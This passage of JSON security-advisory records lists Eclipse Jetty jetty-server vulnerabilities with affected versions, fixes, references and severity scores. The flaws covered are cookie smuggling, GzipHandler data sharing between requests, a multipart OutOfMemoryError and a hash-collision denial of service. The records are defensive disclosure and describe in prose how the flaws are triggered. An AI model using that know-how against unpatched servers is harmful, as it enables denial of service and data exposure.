This is significant when an intermediary is enacting some policy based on cookies, so a smuggled cookie can bypass that policy yet still be seen by the Jetty server.\n\n### Patches\n* 9.4.51.v20230217 - via PR #9352\n* 10.0.15 - via PR #9339\n* 11.0.15 - via PR #9339\n\n### Workarounds\nNo workarounds\n\n### References\n* https://www.rfc-editor.org/rfc/rfc2965\n* https://www.rfc-editor.org/rfc/rfc6265\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.51.v20230217" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", 
"8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", 
"9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p26g-97m4-6q7c/GHSA-p26g-97m4-6q7c.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.14" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p26g-97m4-6q7c/GHSA-p26g-97m4-6q7c.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.14" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p26g-97m4-6q7c/GHSA-p26g-97m4-6q7c.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0alpha0" }, { "fixed": "12.0.0.beta0" } ] } ], "versions": [ "12.0.0.alpha0", "12.0.0.alpha1", "12.0.0.alpha2", "12.0.0.alpha3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p26g-97m4-6q7c/GHSA-p26g-97m4-6q7c.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-p26g-97m4-6q7c" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26049" 
}, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/pull/9339" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/pull/9352" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.51.v20230217" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00039.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230526-0001" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5507" }, { "type": "WEB", "url": "https://www.rfc-editor.org/rfc/rfc2965" }, { "type": "WEB", "url": "https://www.rfc-editor.org/rfc/rfc6265" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2023-04-18T22:19:57Z", "nvd_published_at": "2023-04-18T21:15:09Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q4rv-gq96-w7c5", "published": "2025-05-08T19:28:34Z", "modified": "2025-05-08T19:57:34.204933Z", "aliases": [ "CVE-2024-13009" ], "related": [ "CGA-45cx-7c8c-j882", "CGA-rwgq-jjw3-3vrc" ], "summary": "**UNSUPPORTED WHEN ASSIGNED** GzipHandler causes part of request body to be seen as request body of a separate request", "details": "In Eclipse Jetty versions 9.4.0 to 9.4.56 a buffer can be incorrectly released when confronted with a gzip error when inflating a request body. 
This can result in corrupted and/or inadvertent sharing of data between requests.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.57.v20241219" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.52.v20230823", "9.4.53.v20231009", "9.4.54.v20240208", "9.4.55.v20240627", "9.4.56.v20240826", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.56", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-q4rv-gq96-w7c5/GHSA-q4rv-gq96-w7c5.json" } } ], "references": [ { 
"type": "WEB", "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-q4rv-gq96-w7c5" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13009" }, { "type": "PACKAGE", "url": "https://github.com/jetty/jetty.project" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/48" } ], "database_specific": { "cwe_ids": [ "CWE-404" ], "github_reviewed": true, "github_reviewed_at": "2025-05-08T19:28:34Z", "nvd_published_at": "2025-05-08T18:15:41Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qw69-rqj8-6qw8", "published": "2023-04-19T18:15:45Z", "modified": "2024-02-20T05:33:41.250857Z", "aliases": [ "CVE-2023-26048" ], "related": [ "CGA-q672-cgj3-7q4g", "CVE-2023-26048" ], "summary": "OutOfMemoryError for large multipart without filename in Eclipse Jetty", "details": "### Impact\nServlets with multipart support (e.g. 
annotated with `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the client sends a multipart request with a part that has a name but no filename and a very large content.\n\nThis happens even with the default settings of `fileSizeThreshold=0` which should stream the whole part content to disk.\n\nAn attacker client may send a large multipart request and cause the server to throw `OutOfMemoryError`.\nHowever, the server may be able to recover after the `OutOfMemoryError` and continue its service -- although it may take some time.\n\nA very large number of parts may cause the same problem.\n\n### Patches\nPatched in Jetty versions\n\n* 9.4.51.v20230217 - via PR #9345\n* 10.0.14 - via PR #9344\n* 11.0.14 - via PR #9344\n\n### Workarounds\nMultipart parameter `maxRequestSize` must be set to a non-negative value, so the whole multipart content is limited (although still read into memory).\nLimiting multipart parameter `maxFileSize` won't be enough because an attacker can send a large number of parts that summed up will cause memory issues.\n\n### References\n* https://github.com/eclipse/jetty.project/issues/9076\n* https://github.com/jakartaee/servlet/blob/6.0.0/spec/src/main/asciidoc/servlet-spec-body.adoc#32-file-upload\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.51.v20230217" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", 
"7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", 
"9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", 
"9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-qw69-rqj8-6qw8/GHSA-qw69-rqj8-6qw8.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.14" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-qw69-rqj8-6qw8/GHSA-qw69-rqj8-6qw8.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.14" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", 
"11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-qw69-rqj8-6qw8/GHSA-qw69-rqj8-6qw8.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-qw69-rqj8-6qw8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26048" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/9076" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/pull/9344" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/pull/9345" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.51.v20230217" }, { "type": "WEB", "url": "https://github.com/jakartaee/servlet/blob/6.0.0/spec/src/main/asciidoc/servlet-spec-body.adoc#32-file-upload" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00039.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230526-0001" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5507" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-04-19T18:15:45Z", "nvd_published_at": "2023-04-18T21:15:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qxp4-27vx-xmm3", "published": "2022-05-14T01:27:35Z", "modified": "2024-04-19T19:16:17.732170Z", "aliases": [ "CVE-2011-4461" ], "summary": "Improper Input Validation in Jetty", "details": "Jetty 8.1.0.RC2 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many 
crafted parameters.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "8.1.0.RC4" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.1.0.RC2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-qxp4-27vx-xmm3/GHSA-qxp4-27vx-xmm3.json" } } ], "references": [ { "type": 
"ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-4461" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/commit/085c79d7d6cfbccc02821ffdb64968593df3e0bf" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/72017" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190307-0004" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=143387688830075\u0026w=2" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/903934" }, { "type": "WEB", "url": "http://www.ocert.org/advisories/ocert-2011-003.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-1429-1" } ], 